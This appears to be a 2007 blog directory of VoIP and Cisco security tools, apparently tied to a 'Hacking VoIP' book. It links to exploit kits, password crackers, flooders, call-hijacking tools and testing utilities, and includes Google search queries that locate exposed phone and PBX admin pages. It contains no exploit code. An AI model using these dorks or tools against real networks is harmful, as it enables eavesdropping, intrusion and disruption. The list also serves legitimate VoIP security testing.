NIPPER IS A NETWORK INFRASTRUCTURE CONFIGURATION PARSER. NIPPER TAKES A NETWORK INFRASTRUCTURE DEVICE CONFIGURATION, PROCESSES THE FILE AND DETAILS SECURITY-RELATED ISSUES WITH THE CONFIGURATION TOGETHER WITH DETAILED RECOMMENDATIONS. NIPPER WAS PREVIOUS KNOWN AS CISCOPARSE. NIPPER CURRENTLY SUPPORTS CISCO SWITCHES (IOS), CISCO ROUTERS (IOS), CISCO FIREWALLS (PIX/ASA/FWSM) AND JUNIPER NETSCREEN (SCREENOS). OUTPUT IS IN HTML, LATEX, XML AND TEXT. ENCRYPTED PASSWORDS CAN BE OUTPUT TO A JOHN-THE-RIPPER FILE FOR STRENGTH TESTING.

VOMIT

http://vomit.xtdnet.nl/

THE VOMIT UTILITY CONVERTS A CISCO IP PHONE CONVERSATION INTO A WAVE FILE THAT CAN BE PLAYED WITH ORDINARY SOUND PLAYERS. VOMIT REQUIRES A TCPDUMP OUTPUT FILE.

CISCO GLOBAL EXPLOITER

http://packetstormsecurity.org/0405-exploits/cge-13.tar.gz

CISCO GLOBAL EXPLOITER IS A TOOL THAT DEMONSTRATES EXPLOITATION OF THE CISCO 677/678 TELNET BUFFER OVERFLOW VULNERABILITY, IOS ROUTER DENIAL OF SERVICE VULNERABILITY, IOS HTTP AUTH VULNERABILITY AND CISCO IOS HTTP CONFIGURATION ARBITRARY ADMINISTRATIVE ACCESS VULNERABILITY, CISCO CATALYST SSH PROTOCOL MISMATCH DENIAL OF SERVICE VULNERABILITY, CISCO 675 WEB ADMINISTRATION DENIAL OF SERVICE VULNERABILITY, CISCO CATALYST 3500 XL REMOTE ARBITRARY COMMAND VULNERABILITY, CISCO IOS SOFTWARE HTTP REQUEST DENIAL OF SERVICE VULNERABILITY, CISCOSECURE ACS FOR WINDOWS NT SERVER DENIAL OF SERVICE VULNERABILITY, CISCO CATALYST MEMORY LEAK VULNERABILITY, CISCO CATOS CISCOVIEW HTTP SERVER BUFFER OVERFLOW VULNERABILITY, %U ENCODING IDS BYPASS VULNERABILITY (UTF), AND CISCO IOS HTTP DENIAL OF SERVICE VULNERABILITY.

CISTO

http://sourceforge.net/projects/cisto/

CISTO (CISCO SCRIPT TOOL) TOOL FOR MANAGING CISCO DEVICES (IOS, CATOS). ALLOWS TO GET CONFIGS, DO CONFIGURATION, INSTALL NEW IMAGES, CHANGE PASSWORDS, DO SINGLE OR LIST OF SHOW COMMANDS AND LOTS MORE FOR A GIVEN LIST OF DEVICES (RUNNING PARALLEL PROZ.)

SWITCHMAP

http://sourceforge.net/projects/switchmap/

EXAMPLE CAPTURES ARE LOCATED HERE:
http://switchmap.sourceforge.net/portlists/

SWITCHMAP IS A PERL PROGRAM THAT CREATES HTML PAGES THAT SHOW INFORMATION ABOUT A SET OF CISCO ETHERNET SWITCHES. THIS PROGRAM USES SNMP TO GATHER DATA FROM THE SWITCHES.

RANCID

http://www.shrubbery.net/rancid/

RANCID MONITORS A ROUTER'S (OR MORE GENERALLY A DEVICE'S) CONFIGURATION, INCLUDING SOFTWARE AND HARDWARE (CARDS, SERIAL NUMBERS, ETC) AND USES CVS (CONCURRENT VERSION SYSTEM) OR SUBVERSION TO MAINTAIN HISTORY OF CHANGES.

RANCID DOES THIS BY THE VERY SIMPLE PROCESS SUMMARIZED HERE:

LOGIN TO EACH DEVICE IN THE ROUTER TABLE (ROUTER.DB),
RUN VARIOUS COMMANDS TO GET THE INFORMATION THAT WILL BE SAVED,
COOK THE OUTPUT; RE-FORMAT, REMOVE OSCILLATING OR INCREMENTING DATA,
EMAIL ANY DIFFERENCES (SAMPLE) FROM THE PREVIOUS COLLECTION TO A MAIL LIST,
AND FINALLY COMMIT THOSE CHANGES TO THE REVISION CONTROL SYSTEM

RANCID ALSO INCLUDES LOOKING GLASS SOFTWARE. IT IS BASED ON ED KERN'S LOOKING GLASS WHICH WAS ONCE USED FOR HTTP://NITROUS.DIGEX.NET/, FOR THE OLD-SCHOOL FOLKS WHO REMEMBER IT. OUR VERSION HAS ADDED FUNCTIONS, SUPPORTS CISCO, JUNIPER, AND FOUNDRY AND USES THE LOGIN SCRIPTS THAT COME WITH RANCID; SO IT CAN USE TELNET OR SSH TO CONNECT TO YOUR DEVICES(S).

RANCID CURRENTLY SUPPORTS CISCO ROUTERS, JUNIPER ROUTERS, CATALYST SWITCHES, FOUNDRY SWITCHES, REDBACK NASS, ADC EZT3 MUXES, MRTD (AND THUS LIKELY IRRD), ALTEON SWITCHES, AND HP PROCURVE SWITCHES AND A HOST OF OTHERS.
RANCID IS KNOWN TO BE USED AT: AOL, GLOBAL CROSSING, MFN, NTT AMERICA, CERTAINTY SOLUTIONS INC.

SIPTIGER

http://www.vovida.org/applications/downloads/siptiger/

SIPTIGER IS A WEB-BASED PROVISIONING UTILITY FOR CISCO'S LINE OF 7960 AND 7940 SESSION INITIATION PROTOCOL (SIP) IP PHONES AND CISCO SIP PROXY SERVERS (CSPS). THIS UTILITY IS USEFUL FOR ANYONE DEPLOYING CISCO 7960/7940 SIP IP PHONES.

IOSTACK.PL

http://www.phenoelit-us.org/ultimaratio/IOStack2.tgz

IOSTACK.PL IS A SCRIPT TO READ OUT IOS STACK RETURN ADDRESS LOCATIONS.

CISCO ROUTER PASSWORD DECODER

http://www.loud-fat-bloke.co.uk/tools/ciscopass.txt

Simple little perl script to decode router passwords.

VoIP Hacking TOOLS 2

2007-11-22T21:45:00.000-08:00

security tools

These are the tools we demonstrated in the book. The tools listed in blue are the ones we wrote ourselves. Most of our linux tools require that you also download the following two libraries: hack_library and g711conversions.

Chapter 2: Scanning
Chapter 3: Enumeration
Chapter 4: Infrastructure Denial of Service
Chapter 5: Eavesdropping
Chapter 6: Network and Application Interception
Chapter 7: Cisco Unified CallManager
- Skinny Traffic Sample
Chapter 9: Asterisk
- IAX Flooder
- IAX Enumerator
Chapter 11: Fuzzing
Chapter 12: Disruption of Service
Chapter 13: Signaling and Media Manipulation
Chapter 14: SPAMMING/SPIT
- Spitter

VoIP VoiceMail Database (Sounds for identification)

2007-11-22T21:43:00.000-08:00

voicemail database

This is a collection of default sound files of popular VoIP voicemail systems to assist in properly identifying the vendor. This goes along with Chapter 1.

Asterisk 1.2.x (gsm can be played with QuickTime Player):
"[USER'S NAME] {is on the phone, is unavailable} Please leave your message after the tone. When done, hang up or press the pound key."

Avaya IP Office / Audix:
"Your call is being answered by Audix. [USER'S NAME] {is not available ... to leave a message wait for the tone, is busy ... to leave a message wait for the tone}."

Cisco Unity 4.x:
"Record your message at the tone. When you are finished, hang up or hold for more options."

VoIP Google Hacking

2007-11-22T21:42:00.001-08:00

VoIP Google Hacking

Asterisk Management Portal:
intitle:asterisk.management.portal web-access
Cisco Phones:
inurl:"NetworkConfiguration" cisco
Cisco CallManager:
inurl:"ccmuser/logon.asp"
D-Link Phones:
intitle:"D-Link DPH" "web login setting"
Grandstream Phones:
intitle:"Grandstream Device Configuration" password
Linksys (Sipura) Phones:
intitle:" SPA Configuration"
Polycom Soundpoint Phones:
intitle:"SoundPoint IP Configuration"
Snom Phones:
"(e.g. 0114930398330)" snom

VOIP HACKING/TESTING TOOLS

2007-11-22T21:25:00.000-08:00

http://www.voipsa.org/Resources/tools.php

RADVISION PROLAB TEST TOOLS

THE PROLABTM SUITE OF POWERFUL TESTING TOOLS COMPLIES WITH THE MOST RECENT INDUSTRY STANDARDS AND IS SUITABLE FOR USE IN VARIOUS STAGES OF THE PRODUCT DEVELOPMENT CYCLE, QA AND PRE-DEPLOYMENT. THE PRODUCTS PERFORM ESSENTIAL AUTOMATED TESTS FOR IMS, SIP, 3G-324M AND H.323 NETWORKS AND DEVICES, INCLUDING PERFORMANCE, LOAD, STRESS, INTEROPERABILITY, MEDIA AND PROTOCOL COMPLIANCE. TESTING IS SCRIPT-DRIVEN, WHICH ALLOWS FOR MAXIMUM FLEXIBILITY AND CUSTOMIZATION, AND ENABLES THE TESTS TO BE RE-USED. THE TESTING SUITE CONTAINS HUNDREDS OF PRE-WRITTEN SCRIPTS, CANNED MESSAGES AND MEDIA FILES TO ALLOW FOR TURNKEY TEST SETUP.

THESE HIGHLY SCALABLE AND FEATURE-RICH TESTING AND VALIDATION PRODUCTS EMULATE A WIDE RANGE OF REAL-WORLD NETWORK CONDITIONS TO TEST DEVICES AND COMPONENTS IN THE RICH MEDIA COLLABORATIVE NETWORKS. THE PROLAB SUITE ALLOWS VENDORS AND SERVICE PROVIDERS TO PERFORM THE RIGOROUS TESTING AND VALIDATION NEEDED TO ENSURE HIGH QUALITY, DEPENDABLE PRODUCT DEPLOYMENT. THE PROLAB SUITE SIMULATES DIFFERENT NETWORK TOPOLOGIES AND IS SPECIFICALLY DESIGNED TO PERFORM ADVANCED SIGNALING AND MEDIA TESTS. A HIGHLY SOPHISTICATED SCHEDULING SYSTEM ENABLES COMPREHENSIVE AUTOMATED TEST PROCEDURES DURING TESTING CYCLES. THE CLIENT/SERVER APPLICATION IS CAPABLE OF MANAGING SINGLE OR MULTIPLE TEST AGENTS, SUCH AS IMS, SIP, H.323 OR 3G-324M

http://www.radvision.com/Products/TestingTools/

SIPERA (COMMERCIAL)

VARIOUS SECURITY SOLUTIONS TO CIRCUMVENT THE VULNERBILITIES IN IP PBX, SIP TRUNKING, WI-FI, AND IMS PLATFORMS

http://www.sipera.com/

OPEN SOURCE IMS CORE

http://www.openimscore.org/

THE OPEN IMS CORE IS AN IMPLEMENTATION OF IMS CALL SESSION CONTROL FUNCTIONS (CSCFS) AND A LIGHTWEIGHT HOME SUBSCRIBER SERVER (HSS), WHICH TOGETHER FORM THE CORE ELEMENTS OF ALL IMS/NGN ARCHITECTURES AS SPECIFIED TODAY WITHIN 3GPP, 3GPP2, ETSI TISPAN AND THE PACKETCABLE INTIATIVE.

SIPTESTTOOL

http://sourceforge.net/projects/siptesttool/

SIPTESTTOOL IS USED TO PROVIDE YOU A GRAPHIC USE INTERFACE SIP TEST TOOL WHICH CAN BE USED AS A TEST TOOL FOR THE TELE-GROUPS TO TEST THEIR CORE-NETWORK SOFTWARE WHICH SUPPORT SIP PROTOCOL OR AS A AS OR IMS IMPLEMENT IN 3GPP.

ONLINE BANDWIDTH CALCULATERS

http://www.voip-calculator.com/calculator/
http://www.newport-networks.com/pages/voip-bandwidth-calculator.html
http://www.bandcalc.com/
http://www.asteriskguru.com/tools/bandwidth_calculator.php

HAMMER CALL ANALYZER (COMMERCIAL)

http://www.empirix.com/default.asp?action=article&ID=69

THE HAMMER CALL ANALYZER ENABLES USERS TO VISUALIZE SIGNALING AND VOICE QUALITY PROBLEMS IN VOIP NETWORKS. FOR EXAMPLE, THE UNIQUE CALL LIST AND MULTISTAGE CALL FLOW DISPLAY FEATURES WALK ENGINEERS THROUGH THE LEGS OF A PARTICULAR CALL. IN ADDITION, THE HAMMER CALL ANALYZER DISPLAYS WAVEFORMS AND THE STREAM QUALITY SIGNATURE FOR ANY CALL. THESE FEATURES ALLOW ENGINEERS TO VISUALIZE PROBLEMS IN THE EXCHANGE OF MESSAGES BETWEEN THE VARIOUS DEVICES AND TO QUICKLY SOLVE THEM.

FEATURES:

INTUITIVE PROTOCOL-AWARE SEARCHING, FILTERING AND CAPTURE
REAL-TIME, MULTI-STAGE CALL FLOW DISPLAY
IP STREAM VOICE QUALITY ANALYSIS
VOIP AND TDM PROTOCOL DECODES
IMPORT EXTERNAL TRACES FOR ANALYSIS

PROTOCOLS:

VOIP – H.323 (H.225, H.245), MEGACO (H.248), MGCP, RFC 2833, T.38, RTP, RTCP, SIP, SIP-T, SKINNY (SCCP), NCS, TCP, UDP, IP, TDM – ISDN (Q.921, Q.931), SS7 (ISUP, TUP, MTP2), CCITT/ITU AND JNTT VARIANT SUPPORT

VALID 8 CONFORMANCE & EMULATION HARDWARE/SOFTWARE (COMMERCIAL)

http://www.valid8.com/products.html

VALID8.COM, THE MARKET LEADER IN CONFORMANCE AND CUSTOM EMULATION TESTING OFFERS A WIDE RANGE OF TESTING SOLUTIONS FOR VOICE OVER IP (VOIP), NEXT GENERATION NETWORKS (NGN) AND LEGACY PUBLIC SWITCHED TELEPHONE NETWORKS (PSTN) DESIGNED TO ACCELERATE DEPLOYMENT.

TRACEBUSTER

http://www.touchstone-inc.com/tbfeatures.htm

TRACEBUSTER WILL SAVE YOU COUNTLESS HOURS OF DIGGING THROUGH CAPTURE FILES! USE THE FREE TRACEBUSTER TO REPLAY/ANALYZE CALL FLOWS FROM LIBPCAP FORMAT FILES OR STEP UP TO THE PROFESSIONAL EDITIONS FOR INTEGRATED CAPTURE AND REPLAY AND AN UNRIVALED VALUE PROPOSITION!

IBM SIMULATORS FOR IMS

http://www.alphaworks.ibm.com/tech/imssimulators

THE IP MULTIMEDIA SUBSYSTEM (IMS) PROVIDES RICH MULTIMEDIA SERVICES ACROSS BOTH NEXT-GENERATION PACKET-SWITCHED AND TRADITIONAL CIRCUIT-SWITCHED NETWORKS FOR SERVICES AND APPLICATIONS; IT ALSO ENABLES TELCOS, MOBILE OPERATORS, AND OTHER SERVICE PROVIDERS. THE SUBSYSTEM IS STANDARDS-BASED AND USES OPEN INTERFACES AND FUNCTIONAL COMPONENTS THAT CAN BE ASSEMBLED FLEXIBLY INTO HARDWARE AND SOFTWARE SYSTEMS TO SUPPORT REAL-TIME INTERACTIVE SERVICES AND APPLICATIONS.
IBM SIMULATORS FOR IP MULTIMEDIA SUBSYSTEM CAN BE USED FOR DEVELOPING, TESTING, AND DEMONSTRATING SIMPLE IMS APPLICATIONS AND PROOFS-OF-CONCEPT (POC) OF SPECIFIC IMS ARCHITECTURE COMPONENTS. THESE SIMULATORS PROVIDE AN EASY WAY FOR USERS TO SIMULATE AND TEST THE IMS COMPONENTS WITHOUT ANY COMPLEX SET-UP OF IMS SERVERS OR ARCHITECTURE CONFIGURATION.

ASTEROID

http://www.infiltrated.net/asteroid/

ASTEROID IS A SIP DENIAL OF SERVICE TESTING TOOL. IT CONSISTS OF OVER 36,000 UNIQUE SIP PACKETS AND CAN BE QUICKLY MODIFIED TO CREATE OTHERS. PACKETS ARE GROUPED INTO THEIR RESPECTIVE TYPES (INVITES, BYE, CANCEL, ETC.) AND CAN BE SENT INDIVIDUALLY OR CALLED FROM A SHELL SCRIPT AND SENT IN CLUSTERS. ASTEROID HAS EFFECTIVELY CRASHED ALL VERSIONS OF ASTERISK UP UNTIL 1.2.13 AND GREATER WHICH WERE PATCHED AGAINST THE SEQUENCE WHICH CAUSED THE CRASH.

SIPVICIOUS

http://sipvicious.org/blog/

SIPVICIOUS TOOLS ADDRESS THE NEED FOR TRADITIONAL SECURITY TOOLS TO BE PORTED TO SIP. THIS PACKAGE CONSISTS OF A SIP SCANNER, A SIP WARDIALER, AND A SIP PBX CRACKER. THESE TOOLS WERE WRITTEN IN PYTHON.

SIP IRC BOT

http://www.loria.fr/~nassar/readme.html

INTERESTING PROGRAM THAT ALLOWS THE FUNCTIONALITY OF SENDING SPIT AKA SPAM, DENIAL OF SERVICE, SCANS AND PASSWORD CRACKING

SIPGREP

http://cvs.berlios.de/cgi-bin/viewcvs.cgi/ser/sip_router/utils/sipgrep/

IT IS A WRAPPER ON NGREP WHICH:

FILTERS SIP MESSAGES ACCORDING NUMBER IN TO OR FROM HEADER FIELDS
DISPLAYS FROM TAG, TO TAG, CALL-ID AND BRANCH IN DIFFERENT COLORS, THUS IT IS POSSIBLE TO TRACE DIALOGS OR TRANSACTIONS BY "ONE LOOK INTO MESSAGE"
IT CAN STORE RECEIVED MESSAGES INTO A FILE AND SHOW THEM (TOGETHER)

SIPSPY

http://www.wesip.com/mediawiki/index.php/SipSpy

FEATURES:

EACH SIPSPY THAT CONNECTS TO A SPYAGENT, MUST AUTHENTICATE ITSELF USING A LOGIN AND PASSWORD, THESE ARE TRANSFERRED USING A DIGEST METHOD, SO THAT PASSWORDS DONT TRAVEL IN CLEAR-TEXT, AND REPLAY ATTACKS ARE AVOIDED. ALSO EACH USER IS ASSIGNED A ROLE: PLAIN OR ADMIN. ADMINS CAN CHANGE THE DEVICE ON WHICH THE SIPSPY IS MONITORING, AND CAN CHANGE THE BPF FILTER, WHEREAS PLAIN USERS CANNOT. ALSO, YOU CAN PROVIDE SPYAGENT WICH A REGEXP FOR EACH OF THE USERS. THEN, WHEN A SIPSPY PROVIDES A NEW REGEXP TO MATCH SIP PACKETS, SPYAGENT WILL MATCH THE REGEXP TO THAT REGEXP (THAT IS, A REGEXP ON A REGEXP), SO YOU CAN LIMIT THE REGEXP'S THAT USERS CAN USE TO MONITOR SIP TRAFFIC.

SIP DIALOGS/SESSIONS SAVE AND LOAD: SIPSPY CAN SAVE THE MONITORED PACKETS IN AN XML FILE, SO THAT WHEN SOMEONE DETECTS A BUG IN THE SIP NETWORK, THEY CAN SAVE A COPY OF THE SIP DIALOG AND SEND IT TO THE ADMINISTRATORS TO ADDRESS IT.

SERVER-BASED SESSION SAVING: IF ONE OF YOUR USERS/ADMINS DETECTS A BUG IN THE SIP NETWORK, YOU CAN ASK HIM TO REPRODUCE THE BUG AND MONITOR ALL THE SIP PACKETS INVOLVED, AND THEN SAVE THAT SIP SESSION TO THE SERVER, SO THE NEXT MORNING WHEN DEVELOPERS GO TO WORK, THEY CAN DOWNLOAD FROM THE SERVER THE BUGGY SIP DIALOG.

WIST

http://www.devel-it.org/index.php?modulo=projetos&id=2

THIS SOFTWARE WAS BORN AS A PROF CONCEPT IDEA TO CAPTURE SIP TRAFFIC FROM A REMOTE HOST (SIP PROXY, GATEWAY, ETC) AND SHOW LIVE SIP MESSAGES ABOUT AN SPECIFIC DIALOG (FILTERED BY THE FROM SIP USER) TO HELP DEBUG SIP TRANSACTIONS IN A FRIENDLY WAY

SIP PROXY TOOL

http://sourceforge.net/projects/sipproxy/

WITH THE SIP PROXY TOOL YOU WILL HAVE THE OPPORTUNITY TO CHECK AND MANIPULATE SIP MESSAGES. FURTHERMORE YOU WILL BE ABLE TO RUN SEVERAL AUTOMATED ATTACKS AND GETTING THE RESULTS AS A REPORT. SOME OF THESE ATTACKS WILL USE FUZZING TECHNOLOGY.

SIP MESSENGER

http://www.sipcenter.com/sip.nsf/html/Compliance+Engine

SIP MESSENGER IS JAVA SOFTWARE THAT ALLOWS YOU TO SEND SIP TEST MESSAGES FROM TEXT FILES OVER UDP TO YOUR SIP IMPLEMENTATION AND, OPTIONALLY, LISTEN FOR RESPONSES. THE MESSAGES CAN BE SENT USING A COMMAND LINE UTILITY (MESSENGER), SUITABLE FOR INVOCATION BY AUTOMATED SCRIPTING, OR VIA A GUI (MESSENGERGUI). DEVELOPERS CAN USE THIS SOFTWARE TO CONSTRUCT THEIR OWN SIP MESSAGES THAT CAN BE PUSHED ONTO SIP SERVERS OR USER AGENTS (POSSIBLY IN CONJUNCTION WITH THE SIP CENTER¹S OWN SIP RESOURCES – THE SIP NETWORK SERVER AND UA). THIS TOOL IS ESPECIALLY USEFUL FOR STRESS TESTING PRODUCTS WITH SCENARIOS THAT ARE OTHERWISE DIFFICULT TO REPRODUCE. THIS SOFTWARE HAS BEEN MADE AVAILABLE BY UBIQUITY SOFTWARE CORPORATION; FOUNDER OF THE SIP CENTER

PJSIP-PERF

http://www.pjsip.org/pjmedia/docs/html/page_pjsip_perf_c.htm

PJSIP-PERF IS A COMPLETE PROGRAM TO MEASURE THE PERFORMANCE OF PJSIP OR OTHER SIP ENDPOINTS. IT CONSISTS OF TWO PARTS:

THE SERVER, TO RESPOND INCOMING REQUESTS
THE CLIENT, WHO ACTIVELY SUBMITS REQUESTS AND MEASURE THE PERFORMANCE OF THE SERVER.

BOTH SERVER AND CLIENT PART CAN RUN SIMULTANEOUSLY, TO MEASURE THE PERFORMANCE WHEN BOTH ENDPOINTS ARE CO-LOCATED IN A SINGLE PROGRAM.
THE SERVER ACCEPTS BOTH INVITE AND NON-INVITE REQUESTS. THE SERVER EXPORTS SEVERAL DIFFERENT TYPES OF URL, WHICH WOULD CONTROL HOW THE REQUEST WOULD BE HANDLED BY THE SERVER:

URL WITH "0" AS THE USER PART WILL BE HANDLED STATELESSLY. IT SHOULD NOT BE USED WITH INVITE METHOD.
URL WITH "1" AS THE USER PART WILL BE HANDLED STATEFULLY. IF THE REQUEST IS AN INVITE REQUEST, INVITE TRANSACTION WILL BE CREATED AND 200/OK RESPONSE WILL BE SENT, ALONG WITH A VALID SDP BODY. HOWEVER, THE SDP IS JUST A STATIC TEXT BODY, AND IS NOT A PROPER SDP GENERATED BY PJMEDIA.
URL WITH "2" AS THE USER PART IS ONLY MEANINGFUL FOR INVITE REQUESTS, AS IT WOULD BE HANDLED CALL-STATEFULLY BY THE SERVER. FOR THIS URL, THE SERVER ALSO WOULD GENERATE SDP DYNAMICALLY AND PERFORM A PROPER SDP NEGOTIATION FOR THE INCOMING CALL. ALSO FOR EVERY CALL, SERVER WILL LIMIT THE CALL DURATION TO 10 SECONDS, ON WHICH THE CALL WILL BE TERMINATED IF THE CLIENT DOESN'T HANGUP THE CALL.

SIPP

http://sipp.sourceforge.net/

SIPP IS A PERFORMANCE TESTING TRAFFIC TOOL FOR THE SIP PROTOCOL. IT INCLUDES A FEW BASIC SIPSTONE USER AGENT SCENARIOS (UAC AND UAS) AND ESTABLISHES AND RELEASES MULTIPLE CALLS WITH THE INVITE AND BYE METHODS. IT CAN ALSO READ XML SCENARIO FILES DESCRIBING ANY PERFORMANCE TESTING CONFIGURATION. IT FEATURES THE DYNAMIC DISPLAY OF STATISTICS ABOUT RUNNING TESTS (CALL RATE, ROUND TRIP DELAY, AND MESSAGE STATISTICS), PERIODIC CSV STATISTICS DUMPS, TCP AND UDP OVER MULTIPLE SOCKETS OR MULTIPLEXED WITH RETRANSMISSION MANAGEMENT, REGULAR EXPRESSIONS AND VARIABLES IN SCENARIO FILES, AND DYNAMICALLY ADJUSTABLE CALL RATES.
SIPP CAN BE USED TO TEST MANY REAL SIP PLATFORMS LIKE SIP PROXIES, B2BUAS, SIP MEDIA SERVERS, SIP/X GATEWAYS, SIP PBX…. IT IS ALSO VERY USEFUL TO EMULATE THOUSANDS OF USER AGENTS CALLING YOUR SIP SYSTEM.

RTP TOOLS

http://www.cs.columbia.edu/IRT/software/rtptools/

THE RTPTOOLS DISTRIBUTION CONSISTS OF A NUMBER OF SMALL APPLICATIONS THAT CAN BE USED FOR PROCESSING RTP DATA.

RTPPLAY PLAY BACK RTP SESSIONS RECORDED BY RTPDUMP
RTPSEND GENERATE RTP PACKETS FROM TEXTUAL DESCRIPTION, GENERATED BY HAND OR RTPDUMP
RTPDUMP PARSE AND PRINT RTP PACKETS, GENERATING OUTPUT FILES SUITABLE FOR RTPPLAY AND RTPSEND
RTPTRANS RTP TRANSLATOR BETWEEN UNICAST AND MULTICAST NETWORKS; ALSO TRANSLATES BETWEEN VAT AND RTP FORMATS.

RTPBREAK

http://xenion.antifork.org/rtpbreak/index.html

RTPBREAK DETECTS, RECONSTRUCTS AND ANALYZES ANY RTP [RFC1889] SESSION THROUGH HEURISTICS OVER THE UDP NETWORK TRAFFIC. IT WORKS WELL WITH SIP, H.323, SCCP AND ANY OTHER SIGNALING PROTOCOL. IN PARTICULAR, IT DOESN'T REQUIRE THE PRESENCE OF RTCP PACKETS (VOIPONG NEEDS THEM) THAT AREN'T ALWAYS TRANSMITTED FROM THE RECENT VOIP CLIENTS.

SIP SEND FUN

http://www.security-scans.de/index.php?where=ssf

SIP SEND FUN USES NETCAT TO SEND THE DIFFERENT SIP-PAYLOAD TO THE TESTED DEVICE. THE FOLLOWING FUNCTIONS ARE IMPLEMENTED:

PAYLOAD: NEW-MESSAGE, NO-NEW-MESSAGE, INVITE
TEST OF A SINGLE DEVICE OR A CLASS-C SCAN
SOURCE-IP SPOOFING
SEND PAYLOAD TO A SINGLE PORT OR PORTSCAN

SIPCRACK

http://www.codito.de/

SIPCRACK IS A PROTOCOL LOGIN CRACKER. IT CONTAINS 2 PROGRAMS, SIPDUMP TO SNIFF SIP LOGINS OVER THE NETWORK AND SIPCRACK TO BRUTEFORCE THE PASSWORDS OF THE SNIFFED LOGINS

SMAP

http://www.wormulon.net/files/pub/smap-blackhat.tar.gz

SMAP IS A COMBINATION OF NMAP AND SIPSAK. TO SUM UP FUNCTIONALITY IN ONE SENTENCE IT AIDES IN BOTH LOCATING AND FINGERPRINTING REMOTE SIP DEVICES.

SIP ANALYZER

http://sourceforge.net/projects/sipanalzyer

http://ant.comm.ccu.edu.tw/sip/

DISTRIBUTED SIP ANALYZER IS A SIP PROTOCOL ANALYZER FOR UNIX. IT ALLOWS YOU TO EXAMINE SIP FROM DIFFERENT LOCAL AREA NETWORK. YOU CAN INTERACTIVELY BROWSE THE CAPTURE DATA, VIEWING CALLFLOW SEQUENCE DIAGRAM AND DETAIL INFORMATION FOR EACH SIP SESSION.

SIP CALLFLOW SEQUENCE DIAGRAM GENERATOR

http://sourceforge.net/project/showfiles.php?group_id=60608

THE CALLFLOW SEQUENCE DIAGRAM GENERATOR IS A COLLECTION OF AWK AND SHELL SCRIPTS THAT WILL TAKE A PACKET CAPTURE FILE THAT CAN BE READ BY ETHEREAL AND PRODUCE A TIME SEQUENCE DIAGRAM. THIS IS USEFUL TO VIEW AND DEBUG SIP CALLFLOWS OR OTHER NETWORK TRAFFIC

SIPFLOW STANDARD

http://www.sipient.com/standard.html

SIPFLOW STANDARD CAPTURES DATA ON A SINGLE HOST AND DISPLAYS SIP CALLFLOWS IN AN INTUITIVE GRAPHICAL FORMAT. SIP MESSAGES MAY BE VIEWED AS LADDER DIAGRAMS, OR THEIR CONTENTS MAY BE INSPECTED BY DOUBLE CLICKING AN ARROW IN THE LADDER DIAGRAM. THIS ALLOWS NETWORK ENGINEERS TO QUICKLY IDENTIFY THE BEHAVIOR OF THEIR SIP NETWORK WITHOUT TRACING THROUGH LOG FILES OR RAW CAPTURES.

SIPFLOW STANDARD CURRENTLY SUPPORTS:

UDP AND TCP
IP FILTERS
SIP FILTERS (METHOD, TO AND FROM)
SEARCHING CAPABILITIES
IMPORTING ETHEREAL AND TCPDUMP CAPTURES
REASSEMBLING FRAGMENTED PACKETS
MAPPING IP ADDRESS TO NAMES
SIP MESSAGE LOGGING

SIP SCENARIO (CALL FLOW SEQUENCE DIAGRAM GENERATOR)

http://www1.cs.columbia.edu/sip/download/sip_scenario/

THIS PROGRAM MAKES SIP CALLFLOWS (SCENARIOS) DIAGRAMS FROM A SIGNALING TRACE. THE PROGRAM READS THE LIBPCAP OUTPUT FORMAT CREATED BY ETHEREAL, TCPDUMP, ETC) AND CREATES SIP SCENARIO (CALL FLOWS).

EACH ETHERNET PACKET THAT IS CONTAINED IN THE LIBPCAP TRACE FILE IS CALLED A PHYSICAL FRAME. EACH PACKET IS GIVEN A SEQUENCE NUMBER CALLED THE PHYSICAL FRAME NUMBER. THE PHYSICAL FRAME NUMBER IS USED FOR DOCUMENTATIONS AS A REFERENCE TO A FIXED LOCATION.
EACH SIP MESSAGE THAT IS DISPLAYED IS IDENTIFIED BY A SEQUENTIAL NUMBER CALLED THE SIP FRAME NUMBER.
ALL UDP AND TCP PACKETS WILL BE WILL BE PARSED TO CHECK IF THERE ARE SIP MESSAGES OR NOT. NON-SIP MESSAGES WILL BE AUTOMATICALLY FILTERED OUT OF THE DISPLAY.
DIFFERENT SIP CALLS (BASED ON CALLID) WILL BE INDICATED IN DIFFERENT COLORS. LINKS ARE MADE FROM THE SIP SCENARIO (CALL FLOW) TO THE ACTUAL SIP MESSAGE (FRAME DATA).

SIPBOMBER

http://www.metalinkltd.com/downloads.php

SIPBOMBER IS INVALUABLE TOOL FOR SIP DEVELOPERS INTENDED FOR TESTING SIP-PROTOCOL IMPLEMENTATION AGAINST RFC3261. CURRENT VERSION CAN CHECK ONLY SERVER IMPLEMENTATIONS – (PROXIES, USER AGENT SERVERS, REDIRECT SERVERS, AND REGISTRARS). THIS PROGRAM IS DISTRIBUTED UNDER TERMS OF GPL.

HACKING VOIP EXPOSED TOOLS

http://www.hackingvoip.com/sec_tools.html

TOOLS WRITTEN FOR THE BOOK AND LISTED ARE: VLANPING, SIPSCAN, TFTP BRUTE FORCER WITH TFTP BRUTEFORCE FILE, IAX FLOOD, UDP FLOODER, UDP FLOODER W/VLAN SUPPORT, BYE CALL TEARDOWN, RTP FLOODER, INVITE FLOODER, CHECK SYNC PHONE REBOOTER, RTP INJECTOR, REGISTRATION HIJACKER, REGISTRATION ERASER, REGISTRATION ADDER

IETF SIP TORTURE MESSAGES

http://tools.ietf.org/wg/sipping/draft-ietf-sipping-torture-tests/

THESE MESSAGES WERE DEVELOPED AND REFINED AT THE SIPIT INTEROPERABILITY TEST EVENT. DURING THE EVENTS PROBLEMATIC MESSAGES WERE NOTED AND RELEASED AS AN IETF-DRAFT. IT DEFINES TENS OF VALID AND INVALID MESSAGES, DESCRIBES THEM AND GIVES DIRECTIONS AS TO HOW THE SIP APPLICATION SHOULD REACT.

SIPSAK

http://sipsak.org/

SIPSAK IS A SMALL COMMAND LINE TOOL FOR DEVELOPERS AND ADMINISTRATORS OF SESSION INITIATION PROTOCOL (SIP) APPLICATIONS. IT CAN BE USED FOR SOME SIMPLE TESTS ON SIP APPLICATIONS AND DEVICES.

FEATURES:

SENDS OPTIONS REQUEST
SENDS TEXT FILES (WHICH SHOULD CONTAIN SIP REQUESTS)
TRACEROUTE (SEE SECTION 11 IN RFC3261)
USER LOCATION TEST
FLOODING TEST
RANDOM CHARACTER TRASHED TEST
INTERPRET AND REACT ON RESPONSE
AUTHENTICATION WITH QOP SUPPORTED (MD5 AND SHA1)
SHORT NOTATION SUPPORTED FOR RECEIVING (NOT FOR SENDING)
UNLIMITED STRING REPLACEMENTS IN FILES AND REQUESTS
ADD ANY HEADER TO THE REQUESTS
